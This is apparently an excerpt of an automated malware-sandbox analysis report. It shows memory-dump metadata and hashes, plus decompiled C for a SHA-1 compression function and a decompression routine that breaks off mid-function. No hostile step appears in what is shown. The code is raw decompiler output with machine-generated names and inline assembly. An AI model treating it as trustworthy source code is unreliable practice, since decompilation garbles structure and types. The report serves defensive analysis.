              0x00d86e17
              0x00d86e1a
              0x00d86e1d
              0x00000000
              0x00d86e1d
              0x00d86daa
              0x00d86dad
              0x00000000
              0x00000000
              0x00d86db1
              0x00d86dbc
              0x00d86dc2
              0x00d8764b
              0x00d8764b
              0x00000000
              0x00d8764b
              0x00d86dc8
              0x00000000
              0x00000000
              0x00d86dd0
              0x00d86dd6
              0x00000000
              0x00000000
              0x00000000
              0x00d86dd6
              0x00d86d52
              0x00d86d1e
              0x00d86cef
              0x00d86cf3
              0x00d86cf7
              0x00d86cfb
              0x00d86d03
              0x00000000
              0x00000000
              0x00000000

              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 807f214746869600fdd18866b4149cd4aafbd92bc6957c1dafb80c3f5aedf6e6
              • Instruction ID: 4859c586a91b49993edd41088caf775c3e1b33e79b34559daf7dd1bfb507a23b
              • Opcode Fuzzy Hash: 807f214746869600fdd18866b4149cd4aafbd92bc6957c1dafb80c3f5aedf6e6
              • Instruction Fuzzy Hash: 896227706087469FC719DF28C8906B9FBE1FF55308F18866DE99687742D330E955CB60
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D7E973, Relevance: .7, Instructions: 694COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 70%
              			E00D7E973(signed int* _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int* _v20;
				signed int _v24;
				signed int _v28;
				signed int _t429;
				intOrPtr _t431;
				intOrPtr _t436;
				void* _t441;
				intOrPtr _t443;
				signed int _t446;
				void* _t448;
				signed int _t454;
				signed int _t460;
				signed int _t466;
				signed int _t474;
				signed int _t482;
				signed int _t489;
				signed int _t512;
				signed int _t519;
				signed int _t526;
				signed int _t546;
				signed int _t555;
				signed int _t564;
				signed int* _t592;
				signed int _t593;
				signed int _t595;
				signed int _t596;
				signed int* _t597;
				signed int _t598;
				signed int _t599;
				signed int _t601;
				signed int _t603;
				signed int _t604;
				signed int* _t605;
				signed int _t606;
				signed int* _t670;
				signed int* _t741;
				signed int _t752;
				signed int _t769;
				signed int _t773;
				signed int _t777;
				signed int _t781;
				signed int _t782;
				signed int _t786;
				signed int _t787;
				signed int _t791;
				signed int _t796;
				signed int _t800;
				signed int _t804;
				signed int _t806;
				signed int _t809;
				signed int _t810;
				signed int* _t811;
				signed int _t814;
				signed int _t815;
				signed int _t816;
				signed int _t820;
				signed int _t821;
				signed int _t825;
				signed int _t830;
				signed int _t834;
				signed int _t838;
				signed int* _t839;
				signed int _t841;
				signed int _t842;
				signed int _t844;
				signed int _t845;
				signed int _t847;
				signed int* _t848;
				signed int _t851;
				signed int* _t854;
				signed int _t855;
				signed int _t857;
				signed int _t858;
				signed int _t862;
				signed int _t863;
				signed int _t867;
				signed int _t871;
				signed int _t875;
				signed int _t879;
				signed int _t880;
				signed int* _t881;
				signed int _t882;
				signed int _t884;
				signed int _t885;
				signed int _t886;
				signed int _t887;
				signed int _t888;
				signed int _t890;
				signed int _t891;
				signed int _t893;
				signed int _t894;
				signed int _t896;
				signed int _t897;
				signed int* _t898;
				signed int _t899;
				signed int _t901;
				signed int _t902;
				signed int _t904;
				signed int _t905;

				_t906 =  &_v28;
				if(_a16 == 0) {
					_t839 = _a8;
					_v20 = _t839;
					E00D8EA80(_t839, _a12, 0x40);
					_t906 =  &(( &_v28)[3]);
				} else {
					_t839 = _a12;
					_v20 = _t839;
				}
				_t848 = _a4;
				_t593 =  *_t848;
				_t886 = _t848[1];
				_a12 = _t848[2];
				_a16 = _t848[3];
				_v24 = 0;
				_t429 = E00D95604( *_t839);
				asm("rol edx, 0x5");
				 *_t839 = _t429;
				_t851 = _t848[4] + 0x5a827999 + ((_a16 ^ _a12) & _t886 ^ _a16) + _t593 + _t429;
				_t430 = _t839;
				asm("ror ebp, 0x2");
				_v16 = _t839;
				_a8 =  &(_t839[3]);
				do {
					_t431 = E00D95604(_t430[1]);
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_v16 + 4)) = _t431;
					asm("ror ebx, 0x2");
					_a16 = _a16 + 0x5a827999 + ((_a12 ^ _t886) & _t593 ^ _a12) + _t851 + _t431;
					_t436 = E00D95604( *((intOrPtr*)(_a8 - 4)));
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_a8 - 4)) = _t436;
					asm("ror esi, 0x2");
					_a12 = _a12 + 0x5a827999 + ((_t886 ^ _t593) & _t851 ^ _t886) + _a16 + _t436;
					_t441 = E00D95604( *_a8);
					asm("rol edx, 0x5");
					 *_a8 = _t441;
					asm("ror dword [esp+0x48], 0x2");
					_t886 = _t886 + ((_t851 ^ _t593) & _a16 ^ _t593) + _a12 + 0x5a827999 + _t441;
					_t443 = E00D95604( *((intOrPtr*)(_a8 + 4)));
					_a8 = _a8 + 0x14;
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_a8 + 4)) = _t443;
					_t446 = _v24 + 5;
					asm("ror dword [esp+0x48], 0x2");
					_v24 = _t446;
					_t593 = _t593 + ((_t851 ^ _a16) & _a12 ^ _t851) + _t886 + _t443 + 0x5a827999;
					_v16 =  &(_t839[_t446]);
					_t448 = E00D95604(_t839[_t446]);
					_t906 =  &(_t906[5]);
					asm("rol edx, 0x5");
					 *_v16 = _t448;
					_t430 = _v16;
					asm("ror ebp, 0x2");
					_t851 = _t851 + 0x5a827999 + ((_a16 ^ _a12) & _t886 ^ _a16) + _t593 + _t448;
				} while (_v24 != 0xf);
				_t769 = _t839[0xd] ^ _t839[8] ^ _t839[2] ^  *_t839;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				 *_t839 = _t769;
				_t454 = ((_a12 ^ _t886) & _t593 ^ _a12) + _t851 + _t769 + _a16 + 0x5a827999;
				_t773 = _t839[0xe] ^ _t839[9] ^ _t839[3] ^ _t839[1];
				_a16 = _t454;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				asm("ror ebx, 0x2");
				_t839[1] = _t773;
				_t777 = _t839[0xf] ^ _t839[0xa] ^ _t839[4] ^ _t839[2];
				_t460 = ((_t886 ^ _t593) & _t851 ^ _t886) + _t454 + _t773 + _a12 + 0x5a827999;
				asm("ror esi, 0x2");
				_a8 = _t460;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				_t839[2] = _t777;
				_t466 = ((_t851 ^ _t593) & _a16 ^ _t593) + _t460 + 0x5a827999 + _t777 + _t886;
				_t887 = _a16;
				_t781 = _t839[0xb] ^ _t839[5] ^ _t839[3] ^  *_t839;
				_v28 = _t466;
				asm("ror ebp, 0x2");
				_a16 = _t887;
				_t888 = _a8;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				_t839[3] = _t781;
				asm("ror ebp, 0x2");
				_t782 = 0x11;
				_a12 = ((_t851 ^ _t887) & _t888 ^ _t851) + 0x5a827999 + _t466 + _t781 + _t593;
				_a8 = _t888;
				_v16 = _t782;
				do {
					_t89 = _t782 + 5; // 0x16
					_t474 = _t89;
					_v8 = _t474;
					_t91 = _t782 - 5; // 0xc
					_t92 = _t782 + 3; // 0x14
					_t890 = _t92 & 0x0000000f;
					_t595 = _t474 & 0x0000000f;
					_v12 = _t890;
					_t786 = _t839[_t91 & 0x0000000f] ^ _t839[_t782 & 0x0000000f] ^ _t839[_t595] ^ _t839[_t890];
					asm("rol edx, 1");
					_t839[_t890] = _t786;
					_t891 = _v28;
					asm("rol ecx, 0x5");
					asm("ror ebp, 0x2");
					_v28 = _t891;
					_t482 = _v16;
					_v24 = _t851 + (_a16 ^ _a8 ^ _t891) + 0x6ed9eba1 + _a12 + _t786;
					_t854 = _v20;
					_t787 = 0xf;
					_t841 = _t482 + 0x00000006 & _t787;
					_t893 = _t482 + 0x00000004 & _t787;
					_t791 =  *(_t854 + (_t482 - 0x00000004 & _t787) * 4) ^  *(_t854 + (_t482 + 0x00000001 & _t787) * 4) ^  *(_t854 + _t893 * 4) ^  *(_t854 + _t841 * 4);
					asm("rol edx, 1");
					 *(_t854 + _t893 * 4) = _t791;
					_t855 = _a12;
					asm("rol ecx, 0x5");
					asm("ror esi, 0x2");
					_a12 = _t855;
					_t489 = _v16;
					_a16 = _a16 + 0x6ed9eba1 + (_a8 ^ _v28 ^ _t855) + _v24 + _t791;
					_t857 = _t489 + 0x00000007 & 0x0000000f;
					_t670 = _v20;
					_t796 = _v20[_t489 - 0x00000003 & 0x0000000f] ^  *(_t670 + (_t489 + 0x00000002 & 0x0000000f) * 4) ^  *(_t670 + _t595 * 4) ^  *(_t670 + _t857 * 4);
					asm("rol edx, 1");
					 *(_t670 + _t595 * 4) = _t796;
					_t596 = _v24;
					asm("rol ecx, 0x5");
					asm("ror ebx, 0x2");
					_v24 = _t596;
					_t597 = _v20;
					_a8 = _a8 + 0x6ed9eba1 + (_t596 ^ _v28 ^ _a12) + _a16 + _t796;
					asm("rol ecx, 0x5");
					_t800 =  *(_t597 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t597 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t597 + _t841 * 4) ^  *(_t597 + _v12 * 4);
					asm("rol edx, 1");
					 *(_t597 + _t841 * 4) = _t800;
					_t598 = _a16;
					_t839 = _v20;
					asm("ror ebx, 0x2");
					_a16 = _t598;
					_v28 = _v28 + 0x6ed9eba1 + (_v24 ^ _t598 ^ _a12) + _a8 + _t800;
					_t804 = _t839[_v16 - 0x00000007 & 0x0000000f] ^ _t839[_v16 - 0x00000001 & 0x0000000f] ^ _t839[_t893] ^ _t839[_t857];
					_t894 = _a8;
					asm("rol edx, 1");
					_t839[_t857] = _t804;
					_t851 = _v24;
					asm("rol ecx, 0x5");
					_t782 = _v8;
					asm("ror ebp, 0x2");
					_a8 = _t894;
					_a12 = _a12 + 0x6ed9eba1 + (_t851 ^ _t598 ^ _t894) + _v28 + _t804;
					_v16 = _t782;
				} while (_t782 + 3 <= 0x23);
				_t858 = 0x25;
				_v16 = _t858;
				while(1) {
					_t199 = _t858 + 5; // 0x2a
					_t512 = _t199;
					_t200 = _t858 - 5; // 0x20
					_v4 = _t512;
					_t202 = _t858 + 3; // 0x28
					_t806 = _t202 & 0x0000000f;
					_v8 = _t806;
					_t896 = _t512 & 0x0000000f;
					_t862 = _t839[_t200 & 0x0000000f] ^ _t839[_t858 & 0x0000000f] ^ _t839[_t806] ^ _t839[_t896];
					asm("rol esi, 1");
					_t599 = _v28;
					_t839[_t806] = _t862;
					asm("rol edx, 0x5");
					asm("ror ebx, 0x2");
					_t863 = 0xf;
					_v28 = _t599;
					_v24 = _a12 - 0x70e44324 + ((_a8 | _v28) & _t598 | _a8 & _t599) + _t862 + _v24;
					_t519 = _v16;
					_t601 = _t519 + 0x00000006 & _t863;
					_t809 = _t519 + 0x00000004 & _t863;
					_v12 = _t809;
					_t867 = _t839[_t519 - 0x00000004 & _t863] ^ _t839[_t519 + 0x00000001 & _t863] ^ _t839[_t809] ^ _t839[_t601];
					asm("rol esi, 1");
					_t839[_t809] = _t867;
					_t842 = _a12;
					_t810 = _v24;
					asm("rol edx, 0x5");
					asm("ror edi, 0x2");
					_a12 = _t842;
					_t243 = _t810 - 0x70e44324; // -1894007573
					_t811 = _v20;
					_a16 = _t243 + ((_v28 | _t842) & _a8 | _v28 & _t842) + _t867 + _a16;
					_t526 = _v16;
					_t844 = _t526 + 0x00000007 & 0x0000000f;
					_t871 =  *(_t811 + (_t526 - 0x00000003 & 0x0000000f) * 4) ^  *(_t811 + (_t526 + 0x00000002 & 0x0000000f) * 4) ^  *(_t811 + _t844 * 4) ^  *(_t811 + _t896 * 4);
					asm("rol esi, 1");
					 *(_t811 + _t896 * 4) = _t871;
					_t897 = _v24;
					asm("rol edx, 0x5");
					asm("ror ebp, 0x2");
					_t814 = _a16 + 0x8f1bbcdc + ((_t897 | _a12) & _v28 | _t897 & _a12) + _t871 + _a8;
					_v24 = _t897;
					_t898 = _v20;
					_a8 = _t814;
					asm("rol edx, 0x5");
					_t875 =  *(_t898 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t898 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t898 + _v8 * 4) ^  *(_t898 + _t601 * 4);
					asm("rol esi, 1");
					 *(_t898 + _t601 * 4) = _t875;
					_t598 = _a16;
					asm("ror ebx, 0x2");
					_a16 = _t598;
					_t815 = _t814 + ((_v24 | _t598) & _a12 | _v24 & _t598) + 0x8f1bbcdc + _t875 + _v28;
					_v28 = _t815;
					asm("rol edx, 0x5");
					_t879 =  *(_t898 + (_v16 - 0x00000007 & 0x0000000f) * 4) ^  *(_t898 + (_v16 - 0x00000001 & 0x0000000f) * 4) ^  *(_t898 + _t844 * 4) ^  *(_t898 + _v12 * 4);
					asm("rol esi, 1");
					 *(_t898 + _t844 * 4) = _t879;
					_t899 = _a8;
					_t845 = _v24;
					asm("ror ebp, 0x2");
					_a8 = _t899;
					_t858 = _v4;
					_a12 = _t815 - 0x70e44324 + ((_t598 | _t899) & _t845 | _t598 & _t899) + _t879 + _a12;
					_v16 = _t858;
					if(_t858 + 3 > 0x37) {
						break;
					}
					_t839 = _v20;
				}
				_t816 = 0x39;
				_v16 = _t816;
				do {
					_t310 = _t816 + 5; // 0x3e
					_t546 = _t310;
					_v8 = _t546;
					_t312 = _t816 + 3; // 0x3c
					_t313 = _t816 - 5; // 0x34
					_t880 = 0xf;
					_t901 = _t312 & _t880;
					_t603 = _t546 & _t880;
					_t881 = _v20;
					_v4 = _t901;
					_t820 =  *(_t881 + (_t313 & _t880) * 4) ^  *(_t881 + (_t816 & _t880) * 4) ^  *(_t881 + _t603 * 4) ^  *(_t881 + _t901 * 4);
					asm("rol edx, 1");
					 *(_t881 + _t901 * 4) = _t820;
					_t902 = _v28;
					asm("rol ecx, 0x5");
					asm("ror ebp, 0x2");
					_v28 = _t902;
					_v24 = (_a16 ^ _a8 ^ _t902) + _t820 + _t845 + _a12 + 0xca62c1d6;
					_t555 = _v16;
					_t821 = 0xf;
					_t847 = _t555 + 0x00000006 & _t821;
					_t904 = _t555 + 0x00000004 & _t821;
					_t825 =  *(_t881 + (_t555 - 0x00000004 & _t821) * 4) ^  *(_t881 + (_t555 + 0x00000001 & _t821) * 4) ^  *(_t881 + _t904 * 4) ^  *(_t881 + _t847 * 4);
					asm("rol edx, 1");
					 *(_t881 + _t904 * 4) = _t825;
					_t882 = _a12;
					asm("rol ecx, 0x5");
					_a16 = (_a8 ^ _v28 ^ _t882) + _t825 + _a16 + _v24 + 0xca62c1d6;
					_t564 = _v16;
					asm("ror esi, 0x2");
					_a12 = _t882;
					_t884 = _t564 + 0x00000007 & 0x0000000f;
					_t741 = _v20;
					_t830 = _v20[_t564 - 0x00000003 & 0x0000000f] ^  *(_t741 + (_t564 + 0x00000002 & 0x0000000f) * 4) ^  *(_t741 + _t603 * 4) ^  *(_t741 + _t884 * 4);
					asm("rol edx, 1");
					 *(_t741 + _t603 * 4) = _t830;
					_t604 = _v24;
					asm("rol ecx, 0x5");
					asm("ror ebx, 0x2");
					_v24 = _t604;
					_t605 = _v20;
					_a8 = (_t604 ^ _v28 ^ _a12) + _t830 + _a8 + _a16 + 0xca62c1d6;
					asm("rol ecx, 0x5");
					_t834 = _t605[_v16 - 0x00000008 & 0x0000000f] ^ _t605[_v16 + 0xfffffffe & 0x0000000f] ^ _t605[_t847] ^ _t605[_v4];
					asm("rol edx, 1");
					_t605[_t847] = _t834;
					_t845 = _v24;
					asm("ror dword [esp+0x3c], 0x2");
					_v28 = (_t845 ^ _a16 ^ _a12) + _t834 + _v28 + _a8 + 0xca62c1d6;
					_t838 = _t605[_v16 - 0x00000007 & 0x0000000f] ^ _t605[_v16 - 0x00000001 & 0x0000000f] ^ _t605[_t904] ^ _t605[_t884];
					_t905 = _a8;
					asm("rol edx, 1");
					_t605[_t884] = _t838;
					_t606 = _a16;
					_t885 = _v28;
					asm("ror ebp, 0x2");
					_t816 = _v8;
					asm("rol ecx, 0x5");
					_a8 = _t905;
					_t752 = _t885 + 0xca62c1d6 + (_t845 ^ _t606 ^ _t905) + _t838 + _a12;
					_v16 = _t816;
					_a12 = _t752;
				} while (_t816 + 3 <= 0x4b);
				_t592 = _a4;
				_t592[1] = _t592[1] + _t885;
				_t592[2] = _t592[2] + _t905;
				_t592[3] = _t592[3] + _t606;
				 *_t592 =  *_t592 + _t752;
				_t592[4] = _t592[4] + _t845;
				return _t592;
			}










































































































              0x00d7e973
              0x00d7e97f
              0x00d7e98b
              0x00d7e995
              0x00d7e99a
              0x00d7e99f
              0x00d7e981
              0x00d7e981
              0x00d7e985
              0x00d7e985
              0x00d7e9a2
              0x00d7e9ab
              0x00d7e9ad
              0x00d7e9b0
              0x00d7e9ba
              0x00d7e9c0
              0x00d7e9c4
              0x00d7e9dc
              0x00d7e9e7
              0x00d7e9e9
              0x00d7e9eb
              0x00d7e9f0
              0x00d7e9f3
              0x00d7e9f7
              0x00d7e9fb
              0x00d7e9fe
              0x00d7ea09
              0x00d7ea0e
              0x00d7ea28
              0x00d7ea2d
              0x00d7ea38
              0x00d7ea45
              0x00d7ea4a
              0x00d7ea5e
              0x00d7ea65
              0x00d7ea6f
              0x00d7ea7c
              0x00d7ea85
              0x00d7ea95
              0x00d7eaa1
              0x00d7eaa3
              0x00d7eaae
              0x00d7eab3
              0x00d7eab6
              0x00d7eaca
              0x00d7ead1
              0x00d7ead8
              0x00d7eae1
              0x00d7eae5
              0x00d7eae9
              0x00d7eaf4
              0x00d7eaf7
              0x00d7eafa
              0x00d7eb06
              0x00d7eb18
              0x00d7eb1b
              0x00d7eb1d
              0x00d7eb33
              0x00d7eb3b
              0x00d7eb3f
              0x00d7eb4a
              0x00d7eb5c
              0x00d7eb63
              0x00d7eb66
              0x00d7eb6c
              0x00d7eb6e
              0x00d7eb73
              0x00d7eb78
              0x00d7eb8e
              0x00d7eb97
              0x00d7eb99
              0x00d7eb9c
              0x00d7eba2
              0x00d7eba8
              0x00d7ebb7
              0x00d7ebc7
              0x00d7ebc9
              0x00d7ebcf
              0x00d7ebd1
              0x00d7ebd7
              0x00d7ebdc
              0x00d7ebe0
              0x00d7ebe6
              0x00d7ebea
              0x00d7ebf4
              0x00d7ebfb
              0x00d7ec00
              0x00d7ec01
              0x00d7ec05
              0x00d7ec09
              0x00d7ec0d
              0x00d7ec0d
              0x00d7ec0d
              0x00d7ec12
              0x00d7ec16
              0x00d7ec1e
              0x00d7ec24
              0x00d7ec27
              0x00d7ec2a
              0x00d7ec39
              0x00d7ec48
              0x00d7ec4a
              0x00d7ec4d
              0x00d7ec53
              0x00d7ec5d
              0x00d7ec62
              0x00d7ec68
              0x00d7ec6c
              0x00d7ec70
              0x00d7ec74
              0x00d7ec78
              0x00d7ec7d
              0x00d7ec90
              0x00d7ec9f
              0x00d7eca1
              0x00d7eca4
              0x00d7ecaa
              0x00d7ecaf
              0x00d7ecc2
              0x00d7ecc8
              0x00d7eccc
              0x00d7ecdc
              0x00d7ece5
              0x00d7ecef
              0x00d7ecf2
              0x00d7ecf4
              0x00d7ecfb
              0x00d7ed01
              0x00d7ed10
              0x00d7ed1d
              0x00d7ed23
              0x00d7ed2b
              0x00d7ed4c
              0x00d7ed4f
              0x00d7ed56
              0x00d7ed5a
              0x00d7ed5d
              0x00d7ed67
              0x00d7ed77
              0x00d7ed7c
              0x00d7ed84
              0x00d7ed9b
              0x00d7eda2
              0x00d7eda6
              0x00d7eda8
              0x00d7edab
              0x00d7edb1
              0x00d7edba
              0x00d7edca
              0x00d7edcf
              0x00d7edd6
              0x00d7edda
              0x00d7edde
              0x00d7ede9
              0x00d7edea
              0x00d7edf4
              0x00d7edf4
              0x00d7edf4
              0x00d7edf7
              0x00d7edfa
              0x00d7ee01
              0x00d7ee06
              0x00d7ee0b
              0x00d7ee12
              0x00d7ee20
              0x00d7ee2f
              0x00d7ee31
              0x00d7ee37
              0x00d7ee46
              0x00d7ee49
              0x00d7ee4c
              0x00d7ee4d
              0x00d7ee59
              0x00d7ee5d
              0x00d7ee67
              0x00d7ee69
              0x00d7ee70
              0x00d7ee80
              0x00d7ee89
              0x00d7ee8b
              0x00d7ee8e
              0x00d7ee9a
              0x00d7eea2
              0x00d7eea9
              0x00d7eeac
              0x00d7eeb0
              0x00d7eeb6
              0x00d7eebc
              0x00d7eec0
              0x00d7eed0
              0x00d7eedf
              0x00d7eee2
              0x00d7eee4
              0x00d7eee7
              0x00d7ef0b
              0x00d7ef14
              0x00d7ef17
              0x00d7ef19
              0x00d7ef1d
              0x00d7ef27
              0x00d7ef2e
              0x00d7ef44
              0x00d7ef4e
              0x00d7ef50
              0x00d7ef54
              0x00d7ef62
              0x00d7ef71
              0x00d7ef79
              0x00d7ef7e
              0x00d7ef85
              0x00d7ef9e
              0x00d7efa4
              0x00d7efa6
              0x00d7efaa
              0x00d7efb0
              0x00d7efb8
              0x00d7efbd
              0x00d7efcd
              0x00d7efd3
              0x00d7efd7
              0x00d7efe1
              0x00000000
              0x00000000
              0x00d7edf0
              0x00d7edf0
              0x00d7efe9
              0x00d7efea
              0x00d7efee
              0x00d7efee
              0x00d7efee
              0x00d7eff3
              0x00d7eff7
              0x00d7effc
              0x00d7f001
              0x00d7f006
              0x00d7f008
              0x00d7f00a
              0x00d7f00e
              0x00d7f01d
              0x00d7f02c
              0x00d7f02e
              0x00d7f031
              0x00d7f039
              0x00d7f03e
              0x00d7f047
              0x00d7f04d
              0x00d7f051
              0x00d7f055
              0x00d7f05c
              0x00d7f05e
              0x00d7f071
              0x00d7f080
              0x00d7f082
              0x00d7f085
              0x00d7f08d
              0x00d7f0a0
              0x00d7f0a4
              0x00d7f0a8
              0x00d7f0ab
              0x00d7f0bb
              0x00d7f0c4
              0x00d7f0ce
              0x00d7f0d1
              0x00d7f0d3
              0x00d7f0da
              0x00d7f0de
              0x00d7f0f3
              0x00d7f0fc
              0x00d7f100
              0x00d7f104
              0x00d7f129
              0x00d7f132
              0x00d7f135
              0x00d7f137
              0x00d7f13a
              0x00d7f148
              0x00d7f155
              0x00d7f172
              0x00d7f175
              0x00d7f179
              0x00d7f17b
              0x00d7f17e
              0x00d7f184
              0x00d7f18c
              0x00d7f195
              0x00d7f199
              0x00d7f1a2
              0x00d7f1a6
              0x00d7f1a8
              0x00d7f1af
              0x00d7f1b3
              0x00d7f1bc
              0x00d7f1c0
              0x00d7f1c3
              0x00d7f1c6
              0x00d7f1c9
              0x00d7f1cb
              0x00d7f1d5

              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 21433a5f7de97874b167784364e9de3bea179284053d1adb041105bdc07d2dba
              • Instruction ID: 7bcb56a68683be846e100a681aced3a1871432fae0fc729806b3792ab04e0729
              • Opcode Fuzzy Hash: 21433a5f7de97874b167784364e9de3bea179284053d1adb041105bdc07d2dba
              • Instruction Fuzzy Hash: 075249B26087019FC758CF19C891A6AF7E1FFC8304F49892DF9968B255D734E919CB82
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D866A2, Relevance: .5, Instructions: 509COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 88%
              			E00D866A2(signed int __ecx) {
				void* __ebp;
				signed int _t201;
				signed int _t203;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				signed int _t209;
				signed int _t210;
				signed int _t212;
				signed int _t214;
				signed int _t215;
				signed int _t216;
				signed int _t218;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				unsigned int _t223;
				signed int _t233;
				signed int _t237;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t244;
				signed int _t245;
				signed short _t246;
				signed int _t247;
				signed int _t250;
				signed int* _t251;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				unsigned int _t256;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t263;
				signed int _t264;
				signed short _t265;
				unsigned int _t269;
				unsigned int _t274;
				signed int _t279;
				signed short _t280;
				signed int _t284;
				void* _t291;
				signed int _t293;
				signed int* _t295;
				signed int _t296;
				signed int _t297;
				signed int _t301;
				signed int _t304;
				signed int _t305;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t313;
				intOrPtr _t314;
				signed int _t315;
				unsigned int _t318;
				void* _t320;
				signed int _t323;
				signed int _t324;
				unsigned int _t327;
				void* _t329;
				signed int _t332;
				void* _t335;
				signed int _t338;
				signed int _t339;
				intOrPtr* _t341;
				void* _t342;
				signed int _t345;
				signed int* _t349;
				signed int _t350;
				unsigned int _t354;
				void* _t356;
				signed int _t359;
				void* _t363;
				signed int _t366;
				signed int _t367;
				unsigned int _t370;
				void* _t372;
				signed int _t375;
				intOrPtr* _t377;
				void* _t378;
				signed int _t381;
				void* _t384;
				signed int _t388;
				signed int _t389;
				intOrPtr* _t391;
				void* _t392;
				signed int _t395;
				void* _t398;
				signed int _t401;
				signed int _t402;
				intOrPtr* _t404;
				void* _t405;
				signed int _t408;
				signed int _t414;
				unsigned int _t416;
				unsigned int _t420;
				signed int _t423;
				signed int _t424;
				unsigned int _t426;
				unsigned int _t430;
				signed int _t433;
				signed int _t434;
				void* _t435;
				signed int _t436;
				intOrPtr* _t438;
				signed char _t440;
				signed int _t442;
				intOrPtr _t443;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				void* _t455;

				_t440 =  *(_t455 + 0x34);
				 *(_t455 + 0x14) = __ecx;
				if( *((char*)(_t440 + 0x2c)) != 0) {
					L3:
					_t313 =  *((intOrPtr*)(_t440 + 0x18));
					_t438 = _t440 + 4;
					__eflags =  *_t438 -  *((intOrPtr*)(_t440 + 0x24)) + _t313;
					if( *_t438 <=  *((intOrPtr*)(_t440 + 0x24)) + _t313) {
						 *(_t440 + 0x4ad8) =  *(_t440 + 0x4ad8) & 0x00000000;
						_t201 =  *((intOrPtr*)(_t440 + 0x20)) - 1 + _t313;
						_t414 =  *((intOrPtr*)(_t440 + 0x4acc)) - 0x10;
						 *(_t455 + 0x14) = _t201;
						 *(_t455 + 0x10) = _t414;
						_t293 = _t201;
						__eflags = _t201 - _t414;
						if(_t201 >= _t414) {
							_t293 = _t414;
						}
						 *(_t455 + 0x3c) = _t293;
						while(1) {
							_t314 =  *_t438;
							__eflags = _t314 - _t293;
							if(_t314 < _t293) {
								goto L15;
							}
							L9:
							__eflags = _t314 - _t201;
							if(__eflags > 0) {
								L93:
								L94:
								return _t201;
							}
							if(__eflags != 0) {
								L12:
								__eflags = _t314 - _t414;
								if(_t314 < _t414) {
									L14:
									__eflags = _t314 -  *((intOrPtr*)(_t440 + 0x4acc));
									if(_t314 >=  *((intOrPtr*)(_t440 + 0x4acc))) {
										L92:
										 *((char*)(_t440 + 0x4ad3)) = 1;
										goto L93;
									}
									goto L15;
								}
								__eflags =  *((char*)(_t440 + 0x4ad2));
								if( *((char*)(_t440 + 0x4ad2)) == 0) {
									goto L92;
								}
								goto L14;
							}
							_t201 =  *(_t440 + 8);
							__eflags = _t201 -  *((intOrPtr*)(_t440 + 0x1c));
							if(_t201 >=  *((intOrPtr*)(_t440 + 0x1c))) {
								goto L93;
							}
							goto L12;
							L15:
							_t315 =  *(_t440 + 0x4adc);
							__eflags =  *(_t440 + 0x4ad8) - _t315 - 8;
							if( *(_t440 + 0x4ad8) > _t315 - 8) {
								_t284 = _t315 + _t315;
								 *(_t440 + 0x4adc) = _t284;
								_push(_t284 * 0xc);
								_push( *(_t440 + 0x4ad4));
								_t310 = E00D92B5E(_t315, _t414);
								__eflags = _t310;
								if(_t310 == 0) {
									E00D76D3A(0xdb00e0);
								}
								 *(_t440 + 0x4ad4) = _t310;
							}
							_t203 =  *(_t440 + 0x4ad8);
							_t295 = _t203 * 0xc +  *(_t440 + 0x4ad4);
							 *(_t455 + 0x24) = _t295;
							 *(_t440 + 0x4ad8) = _t203 + 1;
							_t205 = E00D7A4ED(_t438);
							_t206 =  *(_t440 + 0xb4);
							_t416 = _t205 & 0x0000fffe;
							__eflags = _t416 -  *((intOrPtr*)(_t440 + 0x34 + _t206 * 4));
							if(_t416 >=  *((intOrPtr*)(_t440 + 0x34 + _t206 * 4))) {
								_t442 = 0xf;
								_t207 = _t206 + 1;
								__eflags = _t207 - _t442;
								if(_t207 >= _t442) {
									L27:
									_t318 =  *(_t438 + 4) + _t442;
									 *(_t438 + 4) = _t318 & 0x00000007;
									_t209 = _t318 >> 3;
									 *_t438 =  *_t438 + _t209;
									_t320 = 0x10;
